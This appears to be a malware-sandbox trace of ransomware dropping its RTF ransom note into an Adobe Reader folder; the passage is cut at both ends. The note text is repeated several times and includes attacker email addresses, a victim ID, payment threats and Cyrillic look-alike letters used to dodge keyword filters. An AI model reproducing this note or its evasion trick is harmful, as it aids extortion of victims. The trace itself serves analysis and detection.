s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0070.815] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e971a8*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x1e971a8*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0070.817] CloseHandle (hObject=0x1bc) returned 1 [0070.817] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sve\\bg85_info.rtf")) returned 0xffffffff [0070.817] GetLastError () returned 0x2 [0070.817] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sve\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0070.818] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0070.818] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 